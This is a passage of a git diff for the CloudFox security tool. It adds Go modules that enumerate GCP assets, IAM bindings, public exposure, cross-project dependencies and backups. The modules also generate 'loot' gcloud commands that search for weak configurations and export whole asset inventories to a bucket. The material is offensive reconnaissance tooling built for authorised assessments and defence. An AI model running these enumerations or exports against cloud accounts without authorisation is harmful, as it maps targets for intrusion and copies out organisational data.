- logger.InfoM(fmt.Sprintf("Done retrieving artifact repository resource data from project: %s", projectID), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) - cloudfoxOutput := GCPArtifactRegistryResults{ArtifactData: artifactResults, RepositoryData: repoRestuls} + if len(allArtifacts) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: fmt.Sprintf("%s-artifacts", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME), + Header: m.getArtifactHeader(), + Body: m.artifactsToTableBody(allArtifacts), + }) + } - err = internal.HandleOutput("gcp", format, outputDirectory, verbosity, wrap, globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME, account, projectID, cloudfoxOutput) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) - return + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } } - logger.InfoM(fmt.Sprintf("Done writing output for project %s", projectID), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + } + + output := ArtifactRegistryOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + // Write output using HandleOutputSmart with scope support + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + m.CommandCounter.Error++ } } diff --git a/gcp/commands/assetinventory.go b/gcp/commands/assetinventory.go new file mode 100644 index 00000000..849cc991 --- /dev/null +++ 
b/gcp/commands/assetinventory.go @@ -0,0 +1,861 @@ +package commands + +import ( + "context" + "fmt" + "sort" + "strings" + "sync" + + asset "cloud.google.com/go/asset/apiv1" + "cloud.google.com/go/asset/apiv1/assetpb" + assetservice "github.com/BishopFox/cloudfox/gcp/services/assetService" + "github.com/BishopFox/cloudfox/gcp/shared" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + "google.golang.org/api/iterator" +) + +var ( + assetTypes []string + showCounts bool + checkIAM bool + showDependencies bool + showAll bool +) + +var GCPAssetInventoryCommand = &cobra.Command{ + Use: globals.GCP_ASSET_INVENTORY_MODULE_NAME, + Aliases: []string{"assets", "cai", "resource-graph"}, + Short: "Deep asset analysis with IAM and dependencies (requires Cloud Asset API)", + Long: `Deep resource analysis using Cloud Asset Inventory API. + +USE THIS COMMAND WHEN: +- You need IAM policy analysis (public access detection) +- You want to analyze resource dependencies and cross-project relationships +- You need to filter by specific asset types +- Cloud Asset API is enabled in your projects + +REQUIRES: Cloud Asset API (cloudasset.googleapis.com) to be enabled. +To enable: gcloud services enable cloudasset.googleapis.com --project=PROJECT_ID + +If Cloud Asset API is not enabled, use 'inventory' command instead for a quick +overview that works without the API. + +FEATURES: +- Lists all assets in a project (complete coverage via Asset API) +- Provides asset counts by type (--counts) +- Checks IAM policies for public access (--iam) +- Analyzes resource dependencies and cross-project relationships (--dependencies) +- Supports filtering by asset type (--types) +- Generates query templates for common security use cases + +Flags can be combined to run multiple analyses in a single run. 
+ +Examples: + cloudfox gcp asset-inventory -p my-project + cloudfox gcp asset-inventory -p my-project --counts + cloudfox gcp asset-inventory -p my-project --iam + cloudfox gcp asset-inventory -p my-project --dependencies + cloudfox gcp asset-inventory -p my-project --all + cloudfox gcp asset-inventory -A --iam # All projects, check public access + cloudfox gcp asset-inventory -p my-project --types compute.googleapis.com/Instance,storage.googleapis.com/Bucket`, + Run: runGCPAssetInventoryCommand, +} + +func init() { + GCPAssetInventoryCommand.Flags().StringSliceVar(&assetTypes, "types", []string{}, "Filter by asset types (comma-separated)") + GCPAssetInventoryCommand.Flags().BoolVar(&showCounts, "counts", false, "Show asset counts by type") + GCPAssetInventoryCommand.Flags().BoolVar(&checkIAM, "iam", false, "Check IAM policies for public access") + GCPAssetInventoryCommand.Flags().BoolVar(&showDependencies, "dependencies", false, "Analyze resource dependencies and cross-project relationships") + GCPAssetInventoryCommand.Flags().BoolVar(&showAll, "all", false, "Run all analyses (counts, IAM, dependencies)") +} + +// ResourceDependency represents a dependency between two resources +type ResourceDependency struct { + SourceResource string + SourceType string + TargetResource string + TargetType string + DependencyType string // uses, references, contains + ProjectID string +} + +// CrossProjectResource represents a resource accessed from multiple projects +type CrossProjectResource struct { + ResourceName string + ResourceType string + OwnerProject string + AccessedFrom []string +} + +type AssetInventoryModule struct { + gcpinternal.BaseGCPModule + ProjectAssets map[string][]assetservice.AssetInfo // projectID -> assets + ProjectTypeCounts map[string][]assetservice.AssetTypeCount // projectID -> counts + ProjectDependencies map[string][]ResourceDependency // projectID -> dependencies + CrossProject []CrossProjectResource // global (cross-project by nature) + LootMap 
map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex +} + +type AssetInventoryOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o AssetInventoryOutput) TableFiles() []internal.TableFile { return o.Table } +func (o AssetInventoryOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPAssetInventoryCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_ASSET_INVENTORY_MODULE_NAME) + if err != nil { + return + } + + module := &AssetInventoryModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectAssets: make(map[string][]assetservice.AssetInfo), + ProjectTypeCounts: make(map[string][]assetservice.AssetTypeCount), + ProjectDependencies: make(map[string][]ResourceDependency), + CrossProject: []CrossProjectResource{}, + LootMap: make(map[string]map[string]*internal.LootFile), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *AssetInventoryModule) getAllAssets() []assetservice.AssetInfo { + var all []assetservice.AssetInfo + for _, assets := range m.ProjectAssets { + all = append(all, assets...) + } + return all +} + +func (m *AssetInventoryModule) getAllTypeCounts() []assetservice.AssetTypeCount { + // Merge counts from all projects + countMap := make(map[string]int) + for _, counts := range m.ProjectTypeCounts { + for _, c := range counts { + countMap[c.AssetType] += c.Count + } + } + + var all []assetservice.AssetTypeCount + for assetType, count := range countMap { + all = append(all, assetservice.AssetTypeCount{ + AssetType: assetType, + Count: count, + }) + } + return all +} + +func (m *AssetInventoryModule) getAllDependencies() []ResourceDependency { + var all []ResourceDependency + for _, deps := range m.ProjectDependencies { + all = append(all, deps...) 
+ } + return all +} + +func (m *AssetInventoryModule) initializeLootForProject(projectID string) { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["asset-inventory-details"] = &internal.LootFile{ + Name: "asset-inventory-details", + Contents: "# Cloud Asset Inventory Details\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap[projectID]["asset-inventory-commands"] = &internal.LootFile{ + Name: "asset-inventory-commands", + Contents: "# Cloud Asset Inventory Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } +} + +func (m *AssetInventoryModule) Execute(ctx context.Context, logger internal.Logger) { + // If --all is set, enable all flags + if showAll { + showCounts = true + checkIAM = true + showDependencies = true + } + + // If no flags set, default to basic asset listing + noFlagsSet := !showCounts && !checkIAM && !showDependencies + + // Run requested analyses + if showCounts { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_ASSET_INVENTORY_MODULE_NAME, m.processProjectCounts) + } + + if checkIAM { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_ASSET_INVENTORY_MODULE_NAME, m.processProjectIAM) + } else if noFlagsSet { + // Only run basic listing if no flags and IAM not requested (IAM includes basic info) + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_ASSET_INVENTORY_MODULE_NAME, m.processProject) + } + + if showDependencies { + m.processProjectsDependencies(ctx, logger) + } + + // Build summary message + var summaryParts []string + + allTypeCounts := m.getAllTypeCounts() + if len(allTypeCounts) > 0 { + summaryParts = append(summaryParts, fmt.Sprintf("%d asset type(s)", len(allTypeCounts))) + } + + allAssets := m.getAllAssets() + if len(allAssets) > 0 { + summaryParts = append(summaryParts, fmt.Sprintf("%d asset(s)", len(allAssets))) + } + + if checkIAM { + 
publicCount := 0 + for _, asset := range allAssets { + if asset.PublicAccess { + publicCount++ + } + } + if publicCount > 0 { + summaryParts = append(summaryParts, fmt.Sprintf("%d with public access", publicCount)) + } + } + + allDeps := m.getAllDependencies() + if len(allDeps) > 0 { + summaryParts = append(summaryParts, fmt.Sprintf("%d dependencies", len(allDeps))) + } + + if len(m.CrossProject) > 0 { + summaryParts = append(summaryParts, fmt.Sprintf("%d cross-project resources", len(m.CrossProject))) + } + + if len(summaryParts) == 0 { + logger.InfoM("No assets found", globals.GCP_ASSET_INVENTORY_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %s", strings.Join(summaryParts, ", ")), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *AssetInventoryModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating assets in project: %s", projectID), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + } + + m.mu.Lock() + m.initializeLootForProject(projectID) + m.mu.Unlock() + + svc := assetservice.New() + assets, err := svc.ListAssets(projectID, assetTypes) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_ASSET_INVENTORY_MODULE_NAME, + fmt.Sprintf("Could not enumerate assets in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectAssets[projectID] = append(m.ProjectAssets[projectID], assets...) 
+ for _, asset := range assets { + m.addToLoot(projectID, asset) + } + m.mu.Unlock() +} + +func (m *AssetInventoryModule) processProjectIAM(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating assets with IAM in project: %s", projectID), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + } + + m.mu.Lock() + m.initializeLootForProject(projectID) + m.mu.Unlock() + + svc := assetservice.New() + assets, err := svc.ListAssetsWithIAM(projectID, assetTypes) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_ASSET_INVENTORY_MODULE_NAME, + fmt.Sprintf("Could not enumerate assets with IAM in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectAssets[projectID] = append(m.ProjectAssets[projectID], assets...) + for _, asset := range assets { + m.addToLoot(projectID, asset) + } + m.mu.Unlock() +} + +func (m *AssetInventoryModule) processProjectCounts(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Counting assets in project: %s", projectID), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + } + + m.mu.Lock() + m.initializeLootForProject(projectID) + m.mu.Unlock() + + svc := assetservice.New() + counts, err := svc.GetAssetTypeCounts(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_ASSET_INVENTORY_MODULE_NAME, + fmt.Sprintf("Could not count assets in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectTypeCounts[projectID] = counts + m.mu.Unlock() +} + +// processProjectsDependencies analyzes assets with full dependency tracking +func (m *AssetInventoryModule) processProjectsDependencies(ctx context.Context, logger internal.Logger) { + logger.InfoM("Analyzing assets and dependencies...", globals.GCP_ASSET_INVENTORY_MODULE_NAME) + + assetClient, err := 
asset.NewClient(ctx) + if err != nil { + parsedErr := gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_ASSET_INVENTORY_MODULE_NAME, + "Could not create Cloud Asset client") + return + } + defer assetClient.Close() + + var wg sync.WaitGroup + for _, projectID := range m.ProjectIDs { + wg.Add(1) + go func(project string) { + defer wg.Done() + m.processProjectWithDependencies(ctx, project, assetClient, logger) + }(projectID) + } + wg.Wait() + + // Analyze cross-project dependencies + m.analyzeCrossProjectResources() + + // Generate query templates + m.generateQueryTemplates() +} + +func (m *AssetInventoryModule) processProjectWithDependencies(ctx context.Context, projectID string, assetClient *asset.Client, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Analyzing dependencies in project: %s", projectID), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + } + + m.mu.Lock() + m.initializeLootForProject(projectID) + m.mu.Unlock() + + parent := fmt.Sprintf("projects/%s", projectID) + req := &assetpb.ListAssetsRequest{ + Parent: parent, + ContentType: assetpb.ContentType_RESOURCE, + PageSize: 500, + } + + it := assetClient.ListAssets(ctx, req) + + for { + assetItem, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + m.CommandCounter.Error++ + parsedErr := gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_ASSET_INVENTORY_MODULE_NAME, + fmt.Sprintf("Could not enumerate assets in project %s", projectID)) + break + } + + // Convert to AssetInfo for consistency + assetInfo := assetservice.AssetInfo{ + Name: assetItem.Name, + AssetType: assetItem.AssetType, + ProjectID: projectID, + } + + if assetItem.Resource != nil { + assetInfo.Location = assetItem.Resource.Location + } + + m.mu.Lock() + m.ProjectAssets[projectID] = append(m.ProjectAssets[projectID], 
assetInfo) + m.mu.Unlock() + + // Analyze dependencies + m.analyzeAssetDependencies(assetItem, projectID) + } +} + +func (m *AssetInventoryModule) analyzeAssetDependencies(assetItem *assetpb.Asset, projectID string) { + if assetItem.Resource == nil || assetItem.Resource.Data == nil { + return + } + + // Common dependency patterns + dependencyFields := map[string]string{ + "network": "uses", + "subnetwork": "uses", + "serviceAccount": "uses", + "disk": "uses", + "snapshot": "references", + "image": "references", + "keyRing": "uses", + "cryptoKey": "uses", + "topic": "references", + "subscription": "references", + "bucket": "uses", + "dataset": "references", + "cluster": "contains", + } + + for field, depType := range dependencyFields { + if value, ok := assetItem.Resource.Data.Fields[field]; ok { + targetResource := value.GetStringValue() + if targetResource != "" { + dependency := ResourceDependency{ + SourceResource: assetItem.Name, + SourceType: assetItem.AssetType, + TargetResource: targetResource, + TargetType: m.inferResourceType(field), + DependencyType: depType, + ProjectID: projectID, + } + + m.mu.Lock() + m.ProjectDependencies[projectID] = append(m.ProjectDependencies[projectID], dependency) + m.mu.Unlock() + } + } + } +} + +func (m *AssetInventoryModule) inferResourceType(fieldName string) string { + typeMap := map[string]string{ + "network": "compute.googleapis.com/Network", + "subnetwork": "compute.googleapis.com/Subnetwork", + "serviceAccount": "iam.googleapis.com/ServiceAccount", + "disk": "compute.googleapis.com/Disk", + "snapshot": "compute.googleapis.com/Snapshot", + "image": "compute.googleapis.com/Image", + "keyRing": "cloudkms.googleapis.com/KeyRing", + "cryptoKey": "cloudkms.googleapis.com/CryptoKey", + "topic": "pubsub.googleapis.com/Topic", + "subscription": "pubsub.googleapis.com/Subscription", + "bucket": "storage.googleapis.com/Bucket", + "dataset": "bigquery.googleapis.com/Dataset", + "cluster": "container.googleapis.com/Cluster", + } + + 
if assetType, ok := typeMap[fieldName]; ok { + return assetType + } + return "unknown" +} + +func (m *AssetInventoryModule) analyzeCrossProjectResources() { + m.mu.Lock() + defer m.mu.Unlock() + + targetToSources := make(map[string][]string) + targetToType := make(map[string]string) + + allDeps := m.getAllDependencies() + for _, dep := range allDeps { + targetProject := m.extractProjectFromResource(dep.TargetResource) + if targetProject != "" && targetProject != dep.ProjectID { + targetToSources[dep.TargetResource] = append(targetToSources[dep.TargetResource], dep.ProjectID) + targetToType[dep.TargetResource] = dep.TargetType + } + } + + for target, sources := range targetToSources { + crossProject := CrossProjectResource{ + ResourceName: target, + ResourceType: targetToType[target], + OwnerProject: m.extractProjectFromResource(target), + AccessedFrom: sources, + } + + m.CrossProject = append(m.CrossProject, crossProject) + } +} + +func (m *AssetInventoryModule) extractProjectFromResource(resource string) string { + if strings.Contains(resource, "projects/") { + parts := strings.Split(resource, "/") + for i, part := range parts { + if part == "projects" && i+1 < len(parts) { + return parts[i+1] + } + } + } + return "" +} + +func (m *AssetInventoryModule) extractResourceName(resource string) string { + parts := strings.Split(resource, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return resource +} + +func (m *AssetInventoryModule) generateQueryTemplates() { + templates := []struct { + Name string + Description string + Query string + }{ + {"Public Storage Buckets", "Find all public GCS buckets", `resource.type="storage.googleapis.com/Bucket" AND resource.data.iamConfiguration.uniformBucketLevelAccess.enabled=false`}, + {"VMs with External IPs", "Find compute instances with external IP addresses", `resource.type="compute.googleapis.com/Instance" AND resource.data.networkInterfaces.accessConfigs:*`}, + {"Service Account Keys", "Find all user-managed 
service account keys", `resource.type="iam.googleapis.com/ServiceAccountKey" AND resource.data.keyType="USER_MANAGED"`}, + {"Firewall Rules - Open to Internet", "Find firewall rules allowing 0.0.0.0/0", `resource.type="compute.googleapis.com/Firewall" AND resource.data.sourceRanges:"0.0.0.0/0"`}, + {"Cloud SQL - Public IPs", "Find Cloud SQL instances with public IP", `resource.type="sqladmin.googleapis.com/Instance" AND resource.data.settings.ipConfiguration.ipv4Enabled=true`}, + {"Unencrypted Disks", "Find disks without customer-managed encryption", `resource.type="compute.googleapis.com/Disk" AND NOT resource.data.diskEncryptionKey:*`}, + {"GKE Clusters - Legacy Auth", "Find GKE clusters with legacy authentication", `resource.type="container.googleapis.com/Cluster" AND resource.data.legacyAbac.enabled=true`}, + } + + // Add templates and export commands to each project's loot + for _, projectID := range m.ProjectIDs { + m.mu.Lock() + m.initializeLootForProject(projectID) + + if lootFile := m.LootMap[projectID]["asset-inventory-commands"]; lootFile != nil { + for _, t := range templates { + lootFile.Contents += fmt.Sprintf( + "# %s - %s\ngcloud asset search-all-resources --scope=projects/%s --query='%s'\n\n", + t.Name, t.Description, projectID, t.Query, + ) + } + + lootFile.Contents += "# Export complete asset inventory\n" + lootFile.Contents += fmt.Sprintf( + "gcloud asset export --project=%s --content-type=resource --output-path=gs://BUCKET_NAME/%s-assets.json\n", + projectID, projectID, + ) + } + m.mu.Unlock() + } +} + +func (m *AssetInventoryModule) addToLoot(projectID string, asset assetservice.AssetInfo) { + if lootFile := m.LootMap[projectID]["asset-inventory-details"]; lootFile != nil { + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# ASSET: %s\n"+ + "# =============================================================================\n"+ + "# Type: %s\n# Project: %s\n# Location: 
%s\n", + asset.Name, asset.AssetType, asset.ProjectID, asset.Location) + + if asset.PublicAccess { + lootFile.Contents += "# Public Access: Yes\n" + } + lootFile.Contents += "\n" + } +} + +func (m *AssetInventoryModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *AssetInventoryModule) buildCountsTable(counts []assetservice.AssetTypeCount) *internal.TableFile { + if len(counts) == 0 { + return nil + } + + // Sort by count descending + sort.Slice(counts, func(i, j int) bool { + return counts[i].Count > counts[j].Count + }) + + header := []string{"Asset Type", "Count"} + var body [][]string + for _, tc := range counts { + body = append(body, []string{ + tc.AssetType, + fmt.Sprintf("%d", tc.Count), + }) + } + + return &internal.TableFile{ + Name: "asset-counts", + Header: header, + Body: body, + } +} + +func (m *AssetInventoryModule) buildAssetsTable(assets []assetservice.AssetInfo) []internal.TableFile { + var tables []internal.TableFile + if len(assets) == 0 { + return tables + } + + if checkIAM { + header := []string{"Project", "Name", "Asset Type", "Location", "IAM Binding Role", "IAM Binding Principal", "Public"} + var body [][]string + for _, asset := range assets { + publicAccess := "No" + if asset.PublicAccess { + publicAccess = "Yes" + } + + if len(asset.IAMBindings) == 0 { + body = append(body, []string{ + m.GetProjectName(asset.ProjectID), + asset.Name, + assetservice.ExtractAssetTypeShort(asset.AssetType), + asset.Location, + "-", + "-", + publicAccess, + }) + } else { + for _, binding := range asset.IAMBindings { + for _, member := range binding.Members { + body = append(body, []string{ + m.GetProjectName(asset.ProjectID), + asset.Name, + assetservice.ExtractAssetTypeShort(asset.AssetType), + asset.Location, + binding.Role, + member, + publicAccess, + }) + } + } + } + } + tables = append(tables, 
internal.TableFile{ + Name: "assets", + Header: header, + Body: body, + }) + + // Public assets table + var publicBody [][]string + for _, asset := range assets { + if asset.PublicAccess { + for _, binding := range asset.IAMBindings { + for _, member := range binding.Members { + if shared.IsPublicPrincipal(member) { + publicBody = append(publicBody, []string{ + m.GetProjectName(asset.ProjectID), + asset.Name, + asset.AssetType, + binding.Role, + member, + }) + } + } + } + } + } + + if len(publicBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "public-assets", + Header: []string{"Project", "Name", "Asset Type", "IAM Binding Role", "IAM Binding Principal"}, + Body: publicBody, + }) + } + } else { + header := []string{"Project", "Name", "Asset Type", "Location"} + var body [][]string + for _, asset := range assets { + body = append(body, []string{ + m.GetProjectName(asset.ProjectID), + asset.Name, + assetservice.ExtractAssetTypeShort(asset.AssetType), + asset.Location, + }) + } + tables = append(tables, internal.TableFile{ + Name: "assets", + Header: header, + Body: body, + }) + } + + return tables +} + +func (m *AssetInventoryModule) buildDependenciesTable(deps []ResourceDependency) *internal.TableFile { + if len(deps) == 0 { + return nil + } + + depsHeader := []string{"Project", "Source", "Dependency Type", "Target", "Target Type"} + var depsBody [][]string + for _, d := range deps { + depsBody = append(depsBody, []string{ + m.GetProjectName(d.ProjectID), + m.extractResourceName(d.SourceResource), + d.DependencyType, + m.extractResourceName(d.TargetResource), + assetservice.ExtractAssetTypeShort(d.TargetType), + }) + } + + return &internal.TableFile{ + Name: "asset-dependencies", + Header: depsHeader, + Body: depsBody, + } +} + +func (m *AssetInventoryModule) buildCrossProjectTable() *internal.TableFile { + if len(m.CrossProject) == 0 { + return nil + } + + crossHeader := []string{"Resource", "Type", "Owner Project", "Accessed From"} + var crossBody 
[][]string + for _, c := range m.CrossProject { + crossBody = append(crossBody, []string{ + m.extractResourceName(c.ResourceName), + assetservice.ExtractAssetTypeShort(c.ResourceType), + c.OwnerProject, + strings.Join(c.AccessedFrom, ", "), + }) + } + + return &internal.TableFile{ + Name: "cross-project-resources", + Header: crossHeader, + Body: crossBody, + } +} + +func (m *AssetInventoryModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if counts, ok := m.ProjectTypeCounts[projectID]; ok { + if table := m.buildCountsTable(counts); table != nil { + tableFiles = append(tableFiles, *table) + } + } + + if assets, ok := m.ProjectAssets[projectID]; ok { + tableFiles = append(tableFiles, m.buildAssetsTable(assets)...) + } + + if deps, ok := m.ProjectDependencies[projectID]; ok { + if table := m.buildDependenciesTable(deps); table != nil { + tableFiles = append(tableFiles, *table) + } + } + + return tableFiles +} + +func (m *AssetInventoryModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Get all project IDs that have data + projectIDs := make(map[string]bool) + for projectID := range m.ProjectAssets { + projectIDs[projectID] = true + } + for projectID := range m.ProjectTypeCounts { + projectIDs[projectID] = true + } + for projectID := range m.ProjectDependencies { + projectIDs[projectID] = true + } + + for projectID := range projectIDs { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + 
outputData.ProjectLevelData[projectID] = AssetInventoryOutput{Table: tableFiles, Loot: lootFiles} + } + + // Add cross-project table at org level if we have hierarchy and cross-project data + if crossTable := m.buildCrossProjectTable(); crossTable != nil && m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + orgID := m.Hierarchy.Organizations[0].ID + outputData.OrgLevelData[orgID] = AssetInventoryOutput{ + Table: []internal.TableFile{*crossTable}, + Loot: nil, + } + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + } +} + +func (m *AssetInventoryModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + allCounts := m.getAllTypeCounts() + if table := m.buildCountsTable(allCounts); table != nil { + tables = append(tables, *table) + } + + allAssets := m.getAllAssets() + tables = append(tables, m.buildAssetsTable(allAssets)...) 
+ + allDeps := m.getAllDependencies() + if table := m.buildDependenciesTable(allDeps); table != nil { + tables = append(tables, *table) + } + + if table := m.buildCrossProjectTable(); table != nil { + tables = append(tables, *table) + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := AssetInventoryOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + } +} diff --git a/gcp/commands/backupinventory.go b/gcp/commands/backupinventory.go new file mode 100644 index 00000000..b06d4019 --- /dev/null +++ b/gcp/commands/backupinventory.go @@ -0,0 +1,885 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + "time" + + "github.com/BishopFox/cloudfox/gcp/shared" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + "google.golang.org/api/compute/v1" + sqladmin "google.golang.org/api/sqladmin/v1beta4" +) + +// Module name constant +const GCP_BACKUPINVENTORY_MODULE_NAME string = "backup-inventory" + +var GCPBackupInventoryCommand = &cobra.Command{ + Use: GCP_BACKUPINVENTORY_MODULE_NAME, + Aliases: []string{"backups", "backup", "snapshots", "dr"}, + Short: "Enumerate backup policies, protected resources, and identify backup gaps", + Long: `Inventory backup and disaster recovery 
configurations across GCP resources. + +Features: +- Compute Engine disk snapshots and snapshot schedules +- Cloud SQL automated backups and point-in-time recovery +- Identifies unprotected resources (no backup coverage) +- Analyzes backup retention policies +- Checks for stale or failing backups`, + Run: runGCPBackupInventoryCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type BackupResource struct { + ProjectID string + Name string + ResourceType string // compute-disk, cloudsql-instance + Location string + SizeGB int64 + Protected bool + BackupType string // snapshot, automated, none + Schedule string + RetentionDays int + LastBackup string + BackupCount int + BackupStatus string + PITREnabled bool + BackupLocation string +} + +type IAMBinding struct { + Role string + Members []string +} + +type ComputeSnapshot struct { + ProjectID string + Name string + SourceDisk string + Status string + DiskSizeGB int64 + StorageBytes int64 + CreationTime string + StorageLocats []string + AutoCreated bool + SnapshotType string + IAMBindings []IAMBinding + PublicAccess bool + EncryptionType string + KMSKeyName string +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type BackupInventoryModule struct { + gcpinternal.BaseGCPModule + + ProjectResources map[string][]BackupResource // projectID -> resources + ProjectSnapshots map[string][]ComputeSnapshot // projectID -> snapshots + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex + + // Tracking maps + disksWithBackups map[string]bool + sqlWithBackups map[string]bool + allDisks map[string]diskInfo + allSQLInstances map[string]sqlInstanceInfo +} + +type diskInfo struct { + SizeGB int64 + Zone string + ProjectID string + Name string +} + +type sqlInstanceInfo struct { + ProjectID string + Region string +} + +// ------------------------------ +// Output Struct +// 
------------------------------ +type BackupInventoryOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o BackupInventoryOutput) TableFiles() []internal.TableFile { return o.Table } +func (o BackupInventoryOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPBackupInventoryCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_BACKUPINVENTORY_MODULE_NAME) + if err != nil { + return + } + + module := &BackupInventoryModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectResources: make(map[string][]BackupResource), + ProjectSnapshots: make(map[string][]ComputeSnapshot), + LootMap: make(map[string]map[string]*internal.LootFile), + disksWithBackups: make(map[string]bool), + sqlWithBackups: make(map[string]bool), + allDisks: make(map[string]diskInfo), + allSQLInstances: make(map[string]sqlInstanceInfo), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// 